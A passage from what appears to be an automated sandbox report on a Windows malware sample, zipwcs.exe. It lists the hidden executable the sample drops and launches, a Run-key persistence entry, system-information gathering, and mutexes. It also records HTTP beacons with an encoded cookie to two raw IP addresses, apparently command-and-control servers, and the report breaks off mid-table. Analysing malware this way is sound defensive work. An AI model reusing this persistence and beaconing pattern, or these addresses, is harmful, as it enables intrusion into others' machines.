| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd38 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd58 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEMB48 |
|
1 | |
| Create | mutex_name = PEM474 |
|
1 |
Process #8: zipwcs.exe
95
15
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:53, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x88c |
| Parent PID | 0x474 (c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
888
0x
8C0
0x
8B8
0x
8B0
0x
8AC
0x
8A8
0x
8A4
0x
8A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00328fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00349fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00369fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0038ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00397fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x003b0000 | 0x003b0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x003b0000 | 0x003bbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x003e0000 | 0x003e7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x003f0000 | 0x003fffff | Memory Mapped File | rw |
|
|
|
- |
| 629.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000430000 | 0x00430000 | 0x0050efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d7ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x01d80000 | 0x01dbbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dd0000 | 0x01dd0000 | 0x01e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001dd0000 | 0x01dd0000 | 0x01dd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01e60000 | 0x0212efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x022fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x0222ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0226ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x022affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022b0000 | 0x022b0000 | 0x022b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022c0000 | 0x022c0000 | 0x022fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x023fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x024fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x0253ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027c0000 | 0x027c0000 | 0x027c7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000027d0000 | 0x027d0000 | 0x027d7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002aa0000 | 0x02aa0000 | 0x02b9ffff | Private Memory | rw |
|
|
|
- |
| wshtcpip.dll | 0x74ae0000 | 0x74ae4fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74af0000 | 0x74b2bfff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x74b30000 | 0x74b37fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74b40000 | 0x74cddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x74ce0000 | 0x74cedfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x74cf0000 | 0x74d49fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74d50000 | 0x74d55fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74d60000 | 0x74d6ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74d70000 | 0x74d75fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74d80000 | 0x74d8cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74d90000 | 0x74da4fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74db0000 | 0x74e01fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74e10000 | 0x74e2bfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74e30000 | 0x74e73fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74fa0000 | 0x7501ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x75080000 | 0x75086fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75090000 | 0x750cafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750d0000 | 0x750e5fff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75220000 | 0x75236fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x75280000 | 0x7528cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x752f0000 | 0x752fafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75500000 | 0x75502fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75740000 | 0x75875fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x758b0000 | 0x758e4fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x75a10000 | 0x75b04fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75f10000 | 0x7610afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77790000 | 0x77795fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | 144.00 KB |
MD5:
b922796295147cdde8292ece2ccf8c2e
SHA1: 89309f2c3118c33d8608a5bd698e84cff3f311d4 SHA256: 2dc18b533e82b6bfe4ca849a61197806714d541d8a77ad8feeb02342baa83854 SSDeep: 1536:ZxmjQOuNIovctrkyZD+ZQOkPn73i+i2DEcZJhW2lJFBclDS0+7GFU6Vxsik5docW:iWCovctrd+UPn7y+rE85lJF8Uq6WnLf |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB |
MD5:
313f3b9702d14cdd9cdc74594cbe2c33
SHA1: 77ed188a36a37583a3983782126dbac3a433aacf SHA256: 8722cde19c755f8550864503bdba27135ec016014d7e89fadd0426ec5f0876ff SSDeep: 384:hBacp75zy7yO7Oq83R/6GWWYNe9qlKtcbiO:hAE9YOFpWW/qlti |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB |
MD5:
b25ed5680eaebd743130ba81c6fa3e7f
SHA1: bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 SHA256: cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 SSDeep: 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 48.00 KB |
MD5:
05de28f54fd17f3e19bb7e5fbdf503e8
SHA1: 1c0c21122e282c5519ded438b05e2dadc366e602 SHA256: d71628e18d0735a13789acf70244011b5ae5b27ed4281a4f95cc0eaccbfa1e2f SSDeep: 48:qHx5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH5EH3WyBcaUMz3P5s+XA8dRTwLDP |
|
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | size = 147456 |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\mddefwmerged\mddefwmerged.exe | - |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = zipwcs, data = "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe", size = 104, type = REG_SZ |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | os_pid = 0x89c, show_window = SW_HIDE |
|
1 |
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Load | user32.dll | base_address = 0x76380000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x75390000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76770000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x76650000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x75740000 |
|
1 | |
| Load | userenv.dll | base_address = 0x75220000 |
|
1 | |
| Load | wininet.dll | base_address = 0x75a10000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x75280000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\629.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd38 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd58 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (41)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 141773 |
|
2 | |
| Get Time | type = Ticks, time = 142787 |
|
1 | |
| Get Time | type = Ticks, time = 143801 |
|
1 | |
| Get Time | type = Ticks, time = 144815 |
|
1 | |
| Get Time | type = Ticks, time = 145829 |
|
1 | |
| Get Time | type = Ticks, time = 145860 |
|
2 | |
| Get Time | type = Ticks, time = 146843 |
|
1 | |
| Get Time | type = Ticks, time = 147857 |
|
1 | |
| Get Time | type = Ticks, time = 148871 |
|
1 | |
| Get Time | type = Ticks, time = 149885 |
|
1 | |
| Get Time | type = Ticks, time = 150899 |
|
1 | |
| Get Time | type = Ticks, time = 151102 |
|
2 | |
| Get Time | type = Ticks, time = 151913 |
|
1 | |
| Get Time | type = Ticks, time = 152927 |
|
1 | |
| Get Time | type = Ticks, time = 153941 |
|
1 | |
| Get Time | type = Ticks, time = 154955 |
|
1 | |
| Get Time | type = Ticks, time = 155969 |
|
3 | |
| Get Time | type = Ticks, time = 156874 |
|
1 | |
| Get Time | type = Ticks, time = 156983 |
|
1 | |
| Get Time | type = Ticks, time = 157997 |
|
1 | |
| Get Time | type = Ticks, time = 159011 |
|
1 | |
| Get Time | type = Ticks, time = 160025 |
|
3 | |
| Get Time | type = Ticks, time = 161695 |
|
2 | |
| Get Time | type = Ticks, time = 161726 |
|
1 | |
| Get Time | type = Ticks, time = 162053 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 |
Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM474 |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 674 bytes |
| Total Data Received | 110.17 KB |
| Contacted Host Count | 2 |
| Contacted Hosts | 96.20.172.107, 64.19.74.49 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 96.20.172.107 |
| Server Port | 8443 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 96.20.172.107, server_port = 8443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 24962=J601YRkCj8bNt8coTnEhjoNS7iCH1kMStMPq+kOvMfqe+CuQmO3cf1wD0RmzC0PMdHE3YmgOL7HGRW6Bj6ZmpRv44FN4kDFP3dMXGlXLJ+9+8yNdD3GsK3KB0c8XPICeByXEgTYn7/woHwgLDFT2dH+mqqCRqPsVKZ601PJIn3vSJgBNXPBne8I0g46KB8aV47kWPa58qKINrk18bgv1sjdM7GheK/s+bs8Q410asdmTQgvwvEaYSzVnN2Wqflh9Ks23ObA/1DnENJku5knYZ3MCpOQAPmsUmvZpke8QKUug66tBhE90E31p/OcGui3fuPy3czJX2U9gNvJln5reIKDOYTd7ereNi7bHslL+dKsqI4HJSlRNG27TREi58bgkOylBtmOpnfq2JWaf8J5HGKi1tE66CmrQR92AzV312Cv6PJirpJ02E2dVrpDTA3JcbGCJ2OfIQcrMdRWLziZFFXJzervQwXFw/9r3gheKE7+aZwCKuTT+bV0VYImCPYrTAu62djKsTllhton6h2AhXq5zUhmy+KnxVXGmw5Sm+WPEkP2Qfo+cSc03KWhvOkF6byp1ryKcakdSJozx/9PwV2WUYwcDvJ/b/qIKkxKlQccqqCPyzAPufJu2XOc6mtsZoxUMkEaADzDgoVNct40p0u9We6/PV8DqX6jnOe1df8N0SkTkSFXZ9bMETXjI6HthURLGyim+cDcZDKukEGW2SkOHwJRyTPTbflTpP2lSzBGDLC8r, url = 96.20.172.107 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 64.19.74.49 |
| Server Port | 8080 |
| Data Sent | 335 |
| Data Received | 112812 |
| Operation | Additional Information | Success | Count | Logfile |
